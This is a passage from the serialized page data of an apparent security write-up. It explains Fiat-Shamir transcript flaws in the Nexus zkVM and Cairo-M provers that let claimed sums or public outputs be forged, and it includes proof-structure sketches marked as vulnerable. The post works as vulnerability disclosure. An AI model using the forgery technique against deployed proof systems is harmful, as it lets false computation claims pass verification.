1,"props":123926,"children":123928},{"className":123927},[10835],[123929,123933,124083],{"type":24,"tag":301,"props":123930,"children":123932},{"className":123931},[28486,120257],[],{"type":24,"tag":301,"props":123934,"children":123936},{"className":123935},[120262],[123937],{"type":24,"tag":301,"props":123938,"children":123940},{"className":123939},[10855,28411],[123941,124072],{"type":24,"tag":301,"props":123942,"children":123944},{"className":123943},[10860],[123945,124067],{"type":24,"tag":301,"props":123946,"children":123948},{"className":123947,"style":120275},[10865],[123949,124036,124047],{"type":24,"tag":301,"props":123950,"children":123951},{"style":120279},[123952,123956],{"type":24,"tag":301,"props":123953,"children":123955},{"className":123954,"style":118911},[10874],[],{"type":24,"tag":301,"props":123957,"children":123959},{"className":123958},[10880,10881,10882,10883],[123960],{"type":24,"tag":301,"props":123961,"children":123963},{"className":123962},[10835,10883],[123964,123969,123974],{"type":24,"tag":301,"props":123965,"children":123967},{"className":123966,"style":120296},[10835,28357,10883],[123968],{"type":30,"value":120299},{"type":24,"tag":301,"props":123970,"children":123972},{"className":123971},[10920,10883],[123973],{"type":30,"value":10894},{"type":24,"tag":301,"props":123975,"children":123977},{"className":123976},[10835,10883],[123978,123988],{"type":24,"tag":301,"props":123979,"children":123981},{"className":123980},[10835,30,10883],[123982],{"type":24,"tag":301,"props":123983,"children":123985},{"className":123984},[10835,10883],[123986],{"type":30,"value":123987},"consumed",{"type":24,"tag":301,"props":123989,"children":123991},{"className":123990},[10850],[123992],{"type":24,"tag":301,"props":123993,"children":123995},{"className":123994},[10855,28411],[123996,124025],{"type":24,"tag":301,"props":123997,"children":123999},{"className":123998},[10860],[124000,124020],{"type":24,"tag":301,"props":124001,"children":124003},{"className":124002,"style":119072},[10865],[124004],{"type":24,"tag":301,"props":124005,"children":124006},{"style":121316},[124007,124011],{"type":24,"tag":301,"props":124008,"children":124010},{"className":124009,"style":115601},[10874],[],{"type":24,"tag":301,"props":124012,"children":124014},{"className":124013},[10880,115606,115607,10883],[124015],{"type":24,"tag":301,"props":124016,"children":124018},{"className":124017,"style":101173},[10835,28357,10883],[124019],{"type":30,"value":95387},{"type":24,"tag":301,"props":124021,"children":124023},{"className":124022},[28514],[124024],{"type":30,"value":28517},{"type":24,"tag":301,"props":124026,"children":124028},{"className":124027},[10860],[124029],{"type":24,"tag":301,"props":124030,"children":124032},{"className":124031,"style":121343},[10865],[124033],{"type":24,"tag":301,"props":124034,"children":124035},{},[],{"type":24,"tag":301,"props":124037,"children":124038},{"style":120312},[124039,124043],{"type":24,"tag":301,"props":124040,"children":124042},{"className":124041,"style":118911},[10874],[],{"type":24,"tag":301,"props":124044,"children":124046},{"className":124045,"style":120322},[120321],[],{"type":24,"tag":301,"props":124048,"children":124049},{"style":120326},[124050,124054],{"type":24,"tag":301,"props":124051,"children":124053},{"className":124052,"style":118911},[10874],[],{"type":24,"tag":301,"props":124055,"children":124057},{"className":124056},[10880,10881,10882,10883],[124058],{"type":24,"tag":301,"props":124059,"children":124061},{"className":124060},[10835,10883],[124062],{"type":24,"tag":301,"props":124063,"children":124065},{"className":124064},[10835,10883],[124066],{"type":30,"value":546},{"type":24,"tag":301,"props":124068,"children":124070},{"className":124069},[28514],[124071],{"type":30,"value":28517},{"type":24,"tag":301,"props":124073,"children":124075},{"className":124074},[10860],[124076],{"type":24,"tag":301,"props":124077,"children":124079},{"className":124078,"style":121391},[10865],[124080],{"type":24,"tag":301,"props":124081,"children":124082},{},[],{"type":24,"tag":301,"props":124084,"children":124086},{"className":124085},[28508,120257],[],{"type":24,"tag":32,"props":124088,"children":124089},{},[124090,124092,124097],{"type":30,"value":124091},"All ",{"type":24,"tag":145,"props":124093,"children":124095},{"className":124094},[],[124096],{"type":30,"value":121603},{"type":30,"value":124098}," values must sum to zero (everything produced is consumed).",{"type":24,"tag":32,"props":124100,"children":124101},{},[124102,124104,124109],{"type":30,"value":124103},"All constraints are combined into a composition polynomial. The verifier then checks this polynomial at a random point outside the execution domain, known as an ",{"type":24,"tag":60,"props":124105,"children":124106},{},[124107],{"type":30,"value":124108},"OODS (Out-of-Domain Sampling)",{"type":30,"value":124110}," test.",{"type":24,"tag":32,"props":124112,"children":124113},{},[124114],{"type":24,"tag":60,"props":124115,"children":124116},{},[124117],{"type":30,"value":122155},{"type":24,"tag":291,"props":124119,"children":124121},{"code":124120},"NexusProof {\n stark_proof: {\n commitments: [Merkle roots of trace columns]\n sampled_values: [polynomial evaluations]\n fri_proof: [low-degree test proof]\n }\n claimed_sum: [FieldElement; NUM_COMPONENTS] // \u003C- VULNERABLE\n log_size: [component sizes]\n}\n",[124122],{"type":24,"tag":145,"props":124123,"children":124124},{"__ignoreMap":7},[124125],{"type":30,"value":124120},{"type":24,"tag":32,"props":124127,"children":124128},{},[124129,124131,124136],{"type":30,"value":124130},"The",{"type":24,"tag":145,"props":124132,"children":124134},{"className":124133},[],[124135],{"type":30,"value":121603},{"type":30,"value":124137}," values are checked to be of correct length, that they sum to zero, and are used in the final composition polynomial. But at no point were they absorbed into the transcript.",{"type":24,"tag":32,"props":124139,"children":124140},{},[124141],{"type":24,"tag":177,"props":124142,"children":124145},{"alt":124143,"src":124144},"6_nexus_flow","/posts/zkvms-unfaithful-claims/6_nexus_flow.svg",[],{"type":24,"tag":32,"props":124147,"children":124148},{},[124149,124151,124160],{"type":30,"value":124150},"The OODS check computes the composition polynomial, which includes logup boundary constraints. These constraints are ",{"type":24,"tag":60,"props":124152,"children":124153},{},[124154,124155],{"type":30,"value":118611},{"type":24,"tag":145,"props":124156,"children":124158},{"className":124157},[],[124159],{"type":30,"value":121603},{"type":30,"value":1679},{"type":24,"tag":32,"props":124162,"children":124163},{},[124164],{"type":30,"value":124165},"The composition polynomial is a random linear combination of constraints:",{"type":24,"tag":32,"props":124167,"children":124168},{},[124169],{"type":24,"tag":145,"props":124170,"children":124172},{"className":124171},[10807,10808],[124173],{"type":24,"tag":301,"props":124174,"children":124176},{"className":124175},[10813],[124177],{"type":24,"tag":301,"props":124178,"children":124180},{"className":124179,"ariaHidden":10819},[10818],[124181,124222,124361],{"type":24,"tag":301,"props":124182,"children":124184},{"className":124183},[10824],[124185,124189,124194,124199,124204,124209,124213,124218],{"type":24,"tag":301,"props":124186,"children":124188},{"className":124187,"style":10935},[10829],[],{"type":24,"tag":301,"props":124190,"children":124192},{"className":124191,"style":28889},[10835,28357],[124193],{"type":30,"value":122968},{"type":24,"tag":301,"props":124195,"children":124197},{"className":124196},[28486],[124198],{"type":30,"value":362},{"type":24,"tag":301,"props":124200,"children":124202},{"className":124201},[10835,28357],[124203],{"type":30,"value":26050},{"type":24,"tag":301,"props":124205,"children":124207},{"className":124206},[28508],[124208],{"type":30,"value":9961},{"type":24,"tag":301,"props":124210,"children":124212},{"className":124211,"style":11012},[10914],[],{"type":24,"tag":301,"props":124214,"children":124216},{"className":124215},[11017],[124217],{"type":30,"value":523},{"type":24,"tag":301,"props":124219,"children":124221},{"className":124220,"style":11012},[10914],[],{"type":24,"tag":301,"props":124223,"children":124225},{"className":124224},[10824],[124226,124230,124287,124291,124348,124352,124357],{"type":24,"tag":301,"props":124227,"children":124229},{"className":124228,"style":122372},[10829],[],{"type":24,"tag":301,"props":124231,"children":124233},{"className":124232},[28393],[124234,124239],{"type":24,"tag":301,"props":124235,"children":124237},{"className":124236,"style":28400},[28393,28398,28399],[124238],{"type":30,"value":115536},{"type":24,"tag":301,"props":124240,"children":124242},{"className":124241},[10850],[124243],{"type":24,"tag":301,"props":124244,"children":124246},{"className":124245},[10855,28411],[124247,124276],{"type":24,"tag":301,"props":124248,"children":124250},{"className":124249},[10860],[124251,124271],{"type":24,"tag":301,"props":124252,"children":124254},{"className":124253,"style":120946},[10865],[124255],{"type":24,"tag":301,"props":124256,"children":124257},{"style":28424},[124258,124262],{"type":24,"tag":301,"props":124259,"children":124261},{"className":124260,"style":10875},[10874],[],{"type":24,"tag":301,"props":124263,"children":124265},{"className":124264},[10880,10881,10882,10883],[124266],{"type":24,"tag":301,"props":124267,"children":124269},{"className":124268},[10835,28357,10883],[124270],{"type":30,"value":10564},{"type":24,"tag":301,"props":124272,"children":124274},{"className":124273},[28514],[124275],{"type":30,"value":28517},{"type":24,"tag":301,"props":124277,"children":124279},{"className":124278},[10860],[124280],{"type":24,"tag":301,"props":124281,"children":124283},{"className":124282,"style":121226},[10865],[124284],{"type":24,"tag":301,"props":124285,"children":124286},{},[],{"type":24,"tag":301,"props":124288,"children":124290},{"className":124289,"style":10953},[10914],[],{"type":24,"tag":301,"props":124292,"children":124294},{"className":124293},[10835],[124295,124300],{"type":24,"tag":301,"props":124296,"children":124298},{"className":124297,"style":121827},[10835,28357],[124299],{"type":30,"value":121830},{"type":24,"tag":301,"props":124301,"children":124303},{"className":124302},[10850],[124304],{"type":24,"tag":301,"props":124305,"children":124307},{"className":124306},[10855,28411],[124308,124337],{"type":24,"tag":301,"props":124309,"children":124311},{"className":124310},[10860],[124312,124332],{"type":24,"tag":301,"props":124313,"children":124315},{"className":124314,"style":100273},[10865],[124316],{"type":24,"tag":301,"props":124317,"children":124318},{"style":122462},[124319,124323],{"type":24,"tag":301,"props":124320,"children":124322},{"className":124321,"style":10875},[10874],[],{"type":24,"tag":301,"props":124324,"children":124326},{"className":124325},[10880,10881,10882,10883],[124327],{"type":24,"tag":301,"props":124328,"children":124330},{"className":124329},[10835,28357,10883],[124331],{"type":30,"value":10564},{"type":24,"tag":301,"props":124333,"children":124335},{"className":124334},[28514],[124336],{"type":30,"value":28517},{"type":24,"tag":301,"props":124338,"children":124340},{"className":124339},[10860],[124341],{"type":24,"tag":301,"props":124342,"children":124344},{"className":124343,"style":99828},[10865],[124345],{"type":24,"tag":301,"props":124346,"children":124347},{},[],{"type":24,"tag":301,"props":124349,"children":124351},{"className":124350,"style":10915},[10914],[],{"type":24,"tag":301,"props":124353,"children":124355},{"className":124354},[10920],[124356],{"type":30,"value":118002},{"type":24,"tag":301,"props":124358,"children":124360},{"className":124359,"style":10915},[10914],[],{"type":24,"tag":301,"props":124362,"children":124364},{"className":124363},[10824],[124365,124369,124431,124436,124441],{"type":24,"tag":301,"props":124366,"children":124368},{"className":124367,"style":10935},[10829],[],{"type":24,"tag":301,"props":124370,"children":124372},{"className":124371},[10835],[124373,124383],{"type":24,"tag":301,"props":124374,"children":124376},{"className":124375},[10835,30],[124377],{"type":24,"tag":301,"props":124378,"children":124380},{"className":124379},[10835],[124381],{"type":30,"value":124382},"constraint",{"type":24,"tag":301,"props":124384,"children":124386},{"className":124385},[10850],[124387],{"type":24,"tag":301,"props":124388,"children":124390},{"className":124389},[10855,28411],[124391,124420],{"type":24,"tag":301,"props":124392,"children":124394},{"className":124393},[10860],[124395,124415],{"type":24,"tag":301,"props":124396,"children":124398},{"className":124397,"style":100273},[10865],[124399],{"type":24,"tag":301,"props":124400,"children":124401},{"style":120869},[124402,124406],{"type":24,"tag":301,"props":124403,"children":124405},{"className":124404,"style":10875},[10874],[],{"type":24,"tag":301,"props":124407,"children":124409},{"className":124408},[10880,10881,10882,10883],[124410],{"type":24,"tag":301,"props":124411,"children":124413},{"className":124412},[10835,28357,10883],[124414],{"type":30,"value":10564},{"type":24,"tag":301,"props":124416,"children":124418},{"className":124417},[28514],[124419],{"type":30,"value":28517},{"type":24,"tag":301,"props":124421,"children":124423},{"className":124422},[10860],[124424],{"type":24,"tag":301,"props":124425,"children":124427},{"className":124426,"style":99828},[10865],[124428],{"type":24,"tag":301,"props":124429,"children":124430},{},[],{"type":24,"tag":301,"props":124432,"children":124434},{"className":124433},[28486],[124435],{"type":30,"value":362},{"type":24,"tag":301,"props":124437,"children":124439},{"className":124438},[10835,28357],[124440],{"type":30,"value":26050},{"type":24,"tag":301,"props":124442,"children":124444},{"className":124443},[28508],[124445],{"type":30,"value":9961},{"type":24,"tag":32,"props":124447,"children":124448},{},[124449,124451,124456,124458,124463],{"type":30,"value":124450},"Since each constraint is linear in its ",{"type":24,"tag":145,"props":124452,"children":124454},{"className":124453},[],[124455],{"type":30,"value":121603},{"type":30,"value":124457},", the overall composition polynomial is linear in all ",{"type":24,"tag":145,"props":124459,"children":124461},{"className":124460},[],[124462],{"type":30,"value":121603},{"type":30,"value":124464}," values.",{"type":24,"tag":32,"props":124466,"children":124467},{},[124468,124470],{"type":30,"value":124469},"The verifier checks ",{"type":24,"tag":145,"props":124471,"children":124473},{"className":124472},[10807,10808],[124474],{"type":24,"tag":301,"props":124475,"children":124477},{"className":124476},[10813],[124478],{"type":24,"tag":301,"props":124479,"children":124481},{"className":124480,"ariaHidden":10819},[10818],[124482,124543],{"type":24,"tag":301,"props":124483,"children":124485},{"className":124484},[10824],[124486,124490,124495,124500,124510,124515,124525,124530,124534,124539],{"type":24,"tag":301,"props":124487,"children":124489},{"className":124488,"style":99687},[10829],[],{"type":24,"tag":301,"props":124491,"children":124493},{"className":124492,"style":28889},[10835,28357],[124494],{"type":30,"value":122968},{"type":24,"tag":301,"props":124496,"children":124498},{"className":124497},[28486],[124499],{"type":30,"value":362},{"type":24,"tag":301,"props":124501,"children":124503},{"className":124502},[10835,30],[124504],{"type":24,"tag":301,"props":124505,"children":124507},{"className":124506},[10835],[124508],{"type":30,"value":124509},"oods",{"type":24,"tag":301,"props":124511,"children":124513},{"className":124512,"style":99745},[10835],[124514],{"type":30,"value":9918},{"type":24,"tag":301,"props":124516,"children":124518},{"className":124517},[10835,30],[124519],{"type":24,"tag":301,"props":124520,"children":124522},{"className":124521},[10835],[124523],{"type":30,"value":124524},"point",{"type":24,"tag":301,"props":124526,"children":124528},{"className":124527},[28508],[124529],{"type":30,"value":9961},{"type":24,"tag":301,"props":124531,"children":124533},{"className":124532,"style":11012},[10914],[],{"type":24,"tag":301,"props":124535,"children":124537},{"className":124536},[11017],[124538],{"type":30,"value":523},{"type":24,"tag":301,"props":124540,"children":124542},{"className":124541,"style":11012},[10914],[],{"type":24,"tag":301,"props":124544,"children":124546},{"className":124545},[10824],[124547,124551],{"type":24,"tag":301,"props":124548,"children":124550},{"className":124549,"style":121794},[10829],[],{"type":24,"tag":301,"props":124552,"children":124554},{"className":124553},[10835,30],[124555],{"type":24,"tag":301,"props":124556,"children":124558},{"className":124557},[10835],[124559],{"type":30,"value":123293},{"type":24,"tag":32,"props":124561,"children":124562},{},[124563,124565,124570,124572,124577],{"type":30,"value":124564},"With ",{"type":24,"tag":145,"props":124566,"children":124568},{"className":124567},[],[124569],{"type":30,"value":121603},{"type":30,"value":124571}," not in transcript, the composition polynomial becomes a linear function of the ",{"type":24,"tag":145,"props":124573,"children":124575},{"className":124574},[],[124576],{"type":30,"value":121603},{"type":30,"value":124578}," values. Combined with the constraint that claimed sums must sum to zero, this is a small linear system that is easily solvable.",{"type":24,"tag":32,"props":124580,"children":124581},{},[124582,124586,124588],{"type":24,"tag":60,"props":124583,"children":124584},{},[124585],{"type":30,"value":123449},{"type":30,"value":124587}," Fixed on October 24, 2025 via ",{"type":24,"tag":188,"props":124589,"children":124592},{"href":124590,"rel":124591},"https://github.com/nexus-xyz/nexus-zkvm/pull/503",[192],[124593],{"type":30,"value":124594},"PR #503",{"type":24,"tag":2719,"props":124596,"children":124597},{},[],{"type":24,"tag":80,"props":124599,"children":124601},{"id":124600},"cairo-m-kakarot-labs",[124602],{"type":30,"value":124603},"Cairo-M (Kakarot Labs)",{"type":24,"tag":32,"props":124605,"children":124606},{},[124607],{"type":30,"value":124608},"Cairo-M, built by Kakarot Labs, is an alternative proof system for the Cairo VM (used by Starknet).",{"type":24,"tag":32,"props":124610,"children":124611},{},[124612],{"type":30,"value":124613},"Cairo-M is in many ways similar to Nexus. It uses logup to prove global statements about the execution.",{"type":24,"tag":32,"props":124615,"children":124616},{},[124617],{"type":24,"tag":60,"props":124618,"children":124619},{},[124620],{"type":30,"value":122155},{"type":24,"tag":291,"props":124622,"children":124624},{"code":124623},"Proof {\n claim: ComponentSizes,\n interaction_claim: LogupClaimsPerComponent,\n public_data: { // \u003C- VULNERABLE\n initial_registers: { pc, fp },\n final_registers: { pc, fp }, // \u003C- forged\n clock, // \u003C- forged\n initial_root, \n final_root, // \u003C- forged\n public_memory: { program, input, output }, //output modified\n },\n stark_proof: [...],\n}\n",[124625],{"type":24,"tag":145,"props":124626,"children":124627},{"__ignoreMap":7},[124628],{"type":30,"value":124623},{"type":24,"tag":32,"props":124630,"children":124631},{},[124632],{"type":24,"tag":60,"props":124633,"children":124634},{},[124635],{"type":30,"value":122171},{"type":24,"tag":32,"props":124637,"children":124638},{},[124639],{"type":24,"tag":177,"props":124640,"children":124643},{"alt":124641,"src":124642},"7_cairo_m_verification","/posts/zkvms-unfaithful-claims/7_cairo_m_verification.svg",[],{"type":24,"tag":32,"props":124645,"children":124646},{},[124647,124649,124655],{"type":30,"value":124648},"Lookup challenges are derived without ",{"type":24,"tag":145,"props":124650,"children":124652},{"className":124651},[],[124653],{"type":30,"value":124654},"public_data",{"type":30,"value":124656}," being mixed into the transcript.",{"type":24,"tag":32,"props":124658,"children":124659},{},[124660,124661,124666,124668,124673],{"type":30,"value":8079},{"type":24,"tag":145,"props":124662,"children":124664},{"className":124663},[],[124665],{"type":30,"value":124654},{"type":30,"value":124667}," (program I/O, boundary registers, memory roots) enters the lookup relations inside ",{"type":24,"tag":5422,"props":124669,"children":124670},{},[124671],{"type":30,"value":124672},"denominators",{"type":30,"value":124674}," through challenge-weighted encodings of tuples. Abstractly, the verifier checks a relation of the form:",{"type":24,"tag":32,"props":124676,"children":124677},{},[124678],{"type":24,"tag":145,"props":124679,"children":124681},{"className":124680},[10807,10808],[124682],{"type":24,"tag":301,"props":124683,"children":124685},{"className":124684},[10813],[124686],{"type":24,"tag":301,"props":124687,"children":124689},{"className":124688,"ariaHidden":10819},[10818],[124690,124750,124796,124842],{"type":24,"tag":301,"props":124691,"children":124693},{"className":124692},[10824],[124694,124698,124704,124709,124718,124723,124732,124737,124741,124746],{"type":24,"tag":301,"props":124695,"children":124697},{"className":124696,"style":99687},[10829],[],{"type":24,"tag":301,"props":124699,"children":124701},{"className":124700},[10835,28357],[124702],{"type":30,"value":124703},"L",{"type":24,"tag":301,"props":124705,"children":124707},{"className":124706},[28486],[124708],{"type":30,"value":362},{"type":24,"tag":301,"props":124710,"children":124712},{"className":124711},[10835,30],[124713],{"type":24,"tag":301,"props":124714,"children":124716},{"className":124715},[10835],[124717],{"type":30,"value":68388},{"type":24,"tag":301,"props":124719,"children":124721},{"className":124720,"style":99745},[10835],[124722],{"type":30,"value":9918},{"type":24,"tag":301,"props":124724,"children":124726},{"className":124725},[10835,30],[124727],{"type":24,"tag":301,"props":124728,"children":124730},{"className":124729},[10835],[124731],{"type":30,"value":10528},{"type":24,"tag":301,"props":124733,"children":124735},{"className":124734},[28508],[124736],{"type":30,"value":9961},{"type":24,"tag":301,"props":124738,"children":124740},{"className":124739,"style":10915},[10914],[],{"type":24,"tag":301,"props":124742,"children":124744},{"className":124743},[10920],[124745],{"type":30,"value":11206},{"type":24,"tag":301,"props":124747,"children":124749},{"className":124748,"style":10915},[10914],[],{"type":24,"tag":301,"props":124751,"children":124753},{"className":124752},[10824],[124754,124758,124768,124773,124783,124787,124792],{"type":24,"tag":301,"props":124755,"children":124757},{"className":124756,"style":99687},[10829],[],{"type":24,"tag":301,"props":124759,"children":124761},{"className":124760},[10835,30],[124762],{"type":24,"tag":301,"props":124763,"children":124765},{"className":124764},[10835],[124766],{"type":30,"value":124767},"(other transcript",{"type":24,"tag":301,"props":124769,"children":124771},{"className":124770,"style":99745},[10835],[124772],{"type":30,"value":9918},{"type":24,"tag":301,"props":124774,"children":124776},{"className":124775},[10835,30],[124777],{"type":24,"tag":301,"props":124778,"children":124780},{"className":124779},[10835],[124781],{"type":30,"value":124782},"bound terms)",{"type":24,"tag":301,"props":124784,"children":124786},{"className":124785,"style":11012},[10914],[],{"type":24,"tag":301,"props":124788,"children":124790},{"className":124789},[11017],[124791],{"type":30,"value":523},{"type":24,"tag":301,"props":124793,"children":124795},{"className":124794,"style":11012},[10914],[],{"type":24,"tag":301,"props":124797,"children":124799},{"className":124798},[10824],[124800,124805,124810,124815,124820,124824,124829,124833,124838],{"type":24,"tag":301,"props":124801,"children":124804},{"className":124802,"style":124803},[10829],"height:0.8778em;vertical-align:-0.1944em;",[],{"type":24,"tag":301,"props":124806,"children":124808},{"className":124807},[10835],[124809],{"type":30,"value":584},{"type":24,"tag":301,"props":124811,"children":124813},{"className":124812},[10946],[124814],{"type":30,"value":10949},{"type":24,"tag":301,"props":124816,"children":124819},{"className":124817,"style":124818},[10914],"margin-right:2em;",[],{"type":24,"tag":301,"props":124821,"children":124823},{"className":124822,"style":10953},[10914],[],{"type":24,"tag":301,"props":124825,"children":124827},{"className":124826},[10835,28357],[124828],{"type":30,"value":124703},{"type":24,"tag":301,"props":124830,"children":124832},{"className":124831,"style":11012},[10914],[],{"type":24,"tag":301,"props":124834,"children":124836},{"className":124835},[11017],[124837],{"type":30,"value":523},{"type":24,"tag":301,"props":124839,"children":124841},{"className":124840,"style":11012},[10914],[],{"type":24,"tag":301,"props":124843,"children":124845},{"className":124844},[10824],[124846,124851,124908,124912,125130],{"type":24,"tag":301,"props":124847,"children":124850},{"className":124848,"style":124849},[10829],"height:1.4071em;vertical-align:-0.562em;",[],{"type":24,"tag":301,"props":124852,"children":124854},{"className":124853},[28393],[124855,124860],{"type":24,"tag":301,"props":124856,"children":124858},{"className":124857,"style":28400},[28393,28398,28399],[124859],{"type":30,"value":115536},{"type":24,"tag":301,"props":124861,"children":124863},{"className":124862},[10850],[124864],{"type":24,"tag":301,"props":124865,"children":124867},{"className":124866},[10855,28411],[124868,124897],{"type":24,"tag":301,"props":124869,"children":124871},{"className":124870},[10860],[124872,124892],{"type":24,"tag":301,"props":124873,"children":124875},{"className":124874,"style":120946},[10865],[124876],{"type":24,"tag":301,"props":124877,"children":124878},{"style":28424},[124879,124883],{"type":24,"tag":301,"props":124880,"children":124882},{"className":124881,"style":10875},[10874],[],{"type":24,"tag":301,"props":124884,"children":124886},{"className":124885},[10880,10881,10882,10883],[124887],{"type":24,"tag":301,"props":124888,"children":124890},{"className":124889},[10835,28357,10883],[124891],{"type":30,"value":10564},{"type":24,"tag":301,"props":124893,"children":124895},{"className":124894},[28514],[124896],{"type":30,"value":28517},{"type":24,"tag":301,"props":124898,"children":124900},{"className":124899},[10860],[124901],{"type":24,"tag":301,"props":124902,"children":124904},{"className":124903,"style":121226},[10865],[124905],{"type":24,"tag":301,"props":124906,"children":124907},{},[],{"type":24,"tag":301,"props":124909,"children":124911},{"className":124910,"style":10953},[10914],[],{"type":24,"tag":301,"props":124913,"children":124915},{"className":124914},[10835],[124916,124920,125126],{"type":24,"tag":301,"props":124917,"children":124919},{"className":124918},[28486,120257],[],{"type":24,"tag":301,"props":124921,"children":124923},{"className":124922},[120262],[124924],{"type":24,"tag":301,"props":124925,"children":124927},{"className":124926},[10855,28411],[124928,125114],{"type":24,"tag":301,"props":124929,"children":124931},{"className":124930},[10860],[124932,125109],{"type":24,"tag":301,"props":124933,"children":124935},{"className":124934,"style":120275},[10865],[124936,125078,125089],{"type":24,"tag":301,"props":124937,"children":124938},{"style":120279},[124939,124943],{"type":24,"tag":301,"props":124940,"children":124942},{"className":124941,"style":118911},[10874],[],{"type":24,"tag":301,"props":124944,"children":124946},{"className":124945},[10880,10881,10882,10883],[124947],{"type":24,"tag":301,"props":124948,"children":124950},{"className":124949},[10835,10883],[124951,124956,124961,124967,124972,124977,125034,125039,125048,125053,125062,125068,125073],{"type":24,"tag":301,"props":124952,"children":124954},{"className":124953,"style":120296},[10835,28357,10883],[124955],{"type":30,"value":120299},{"type":24,"tag":301,"props":124957,"children":124959},{"className":124958},[10920,10883],[124960],{"type":30,"value":11206},{"type":24,"tag":301,"props":124962,"children":124964},{"className":124963},[28486,10883],[124965],{"type":30,"value":124966},"⟨",{"type":24,"tag":301,"props":124968,"children":124970},{"className":124969,"style":121827},[10835,28357,10883],[124971],{"type":30,"value":121830},{"type":24,"tag":301,"props":124973,"children":124975},{"className":124974},[10946,10883],[124976],{"type":30,"value":10949},{"type":24,"tag":301,"props":124978,"children":124980},{"className":124979},[10835,10883],[124981,124986],{"type":24,"tag":301,"props":124982,"children":124984},{"className":124983},[10835,28357,10883],[124985],{"type":30,"value":28499},{"type":24,"tag":301,"props":124987,"children":124989},{"className":124988},[10850],[124990],{"type":24,"tag":301,"props":124991,"children":124993},{"className":124992},[10855,28411],[124994,125023],{"type":24,"tag":301,"props":124995,"children":124997},{"className":124996},[10860],[124998,125018],{"type":24,"tag":301,"props":124999,"children":125001},{"className":125000,"style":121063},[10865],[125002],{"type":24,"tag":301,"props":125003,"children":125004},{"style":115596},[125005,125009],{"type":24,"tag":301,"props":125006,"children":125008},{"className":125007,"style":115601},[10874],[],{"type":24,"tag":301,"props":125010,"children":125012},{"className":125011},[10880,115606,115607,10883],[125013],{"type":24,"tag":301,"props":125014,"children":125016},{"className":125015},[10835,28357,10883],[125017],{"type":30,"value":10564},{"type":24,"tag":301,"props":125019,"children":125021},{"className":125020},[28514],[125022],{"type":30,"value":28517},{"type":24,"tag":301,"props":125024,"children":125026},{"className":125025},[10860],[125027],{"type":24,"tag":301,"props":125028,"children":125030},{"className":125029,"style":115626},[10865],[125031],{"type":24,"tag":301,"props":125032,"children":125033},{},[],{"type":24,"tag":301,"props":125035,"children":125037},{"className":125036},[28486,10883],[125038],{"type":30,"value":362},{"type":24,"tag":301,"props":125040,"children":125042},{"className":125041},[10835,30,10883],[125043],{"type":24,"tag":301,"props":125044,"children":125046},{"className":125045},[10835,10883],[125047],{"type":30,"value":68388},{"type":24,"tag":301,"props":125049,"children":125051},{"className":125050,"style":99745},[10835,10883],[125052],{"type":30,"value":9918},{"type":24,"tag":301,"props":125054,"children":125056},{"className":125055},[10835,30,10883],[125057],{"type":24,"tag":301,"props":125058,"children":125060},{"className":125059},[10835,10883],[125061],{"type":30,"value":10528},{"type":24,"tag":301,"props":125063,"children":125065},{"className":125064},[28508,10883],[125066],{"type":30,"value":125067},")⟩",{"type":24,"tag":301,"props":125069,"children":125071},{"className":125070},[10920,10883],[125072],{"type":30,"value":11206},{"type":24,"tag":301,"props":125074,"children":125076},{"className":125075,"style":121882},[10835,28357,10883],[125077],{"type":30,"value":121885},{"type":24,"tag":301,"props":125079,"children":125080},{"style":120312},[125081,125085],{"type":24,"tag":301,"props":125082,"children":125084},{"className":125083,"style":118911},[10874],[],{"type":24,"tag":301,"props":125086,"children":125088},{"className":125087,"style":120322},[120321],[],{"type":24,"tag":301,"props":125090,"children":125091},{"style":120326},[125092,125096],{"type":24,"tag":301,"props":125093,"children":125095},{"className":125094,"style":118911},[10874],[],{"type":24,"tag":301,"props":125097,"children":125099},{"className":125098},[10880,10881,10882,10883],[125100],{"type":24,"tag":301,"props":125101,"children":125103},{"className":125102},[10835,10883],[125104],{"type":24,"tag":301,"props":125105,"children":125107},{"className":125106},[10835,10883],[125108],{"type":30,"value":546},{"type":24,"tag":301,"props":125110,"children":125112},{"className":125111},[28514],[125113],{"type":30,"value":28517},{"type":24,"tag":301,"props":125115,"children":125117},{"className":125116},[10860],[125118],{"type":24,"tag":301,"props":125119,"children":125122},{"className":125120,"style":125121},[10865],"height:0.562em;",[125123],{"type":24,"tag":301,"props":125124,"children":125125},{},[],{"type":24,"tag":301,"props":125127,"children":125129},{"className":125128},[28508,120257],[],{"type":24,"tag":301,"props":125131,"children":125133},{"className":125132},[10835],[125134],{"type":30,"value":206},{"type":24,"tag":32,"props":125136,"children":125137},{},[125138,125140],{"type":30,"value":125139},"The global check is then that ",{"type":24,"tag":145,"props":125141,"children":125143},{"className":125142},[10807,10808],[125144],{"type":24,"tag":301,"props":125145,"children":125147},{"className":125146},[10813],[125148],{"type":24,"tag":301,"props":125149,"children":125151},{"className":125150,"ariaHidden":10819},[10818],[125152,125193,125224],{"type":24,"tag":301,"props":125153,"children":125155},{"className":125154},[10824],[125156,125160,125165,125170,125175,125180,125184,125189],{"type":24,"tag":301,"props":125157,"children":125159},{"className":125158,"style":10935},[10829],[],{"type":24,"tag":301,"props":125161,"children":125163},{"className":125162},[10835,28357],[125164],{"type":30,"value":124703},{"type":24,"tag":301,"props":125166,"children":125168},{"className":125167},[28486],[125169],{"type":30,"value":362},{"type":24,"tag":301,"props":125171,"children":125173},{"className":125172},[10835,28357],[125174],{"type":30,"value":32},{"type":24,"tag":301,"props":125176,"children":125178},{"className":125177},[28508],[125179],{"type":30,"value":9961},{"type":24,"tag":301,"props":125181,"children":125183},{"className":125182,"style":10915},[10914],[],{"type":24,"tag":301,"props":125185,"children":125187},{"className":125186},[10920],[125188],{"type":30,"value":11206},{"type":24,"tag":301,"props":125190,"children":125192},{"className":125191,"style":10915},[10914],[],{"type":24,"tag":301,"props":125194,"children":125196},{"className":125195},[10824],[125197,125201,125211,125215,125220],{"type":24,"tag":301,"props":125198,"children":125200},{"className":125199,"style":10935},[10829],[],{"type":24,"tag":301,"props":125202,"children":125204},{"className":125203},[10835,30],[125205],{"type":24,"tag":301,"props":125206,"children":125208},{"className":125207},[10835],[125209],{"type":30,"value":125210},"(other 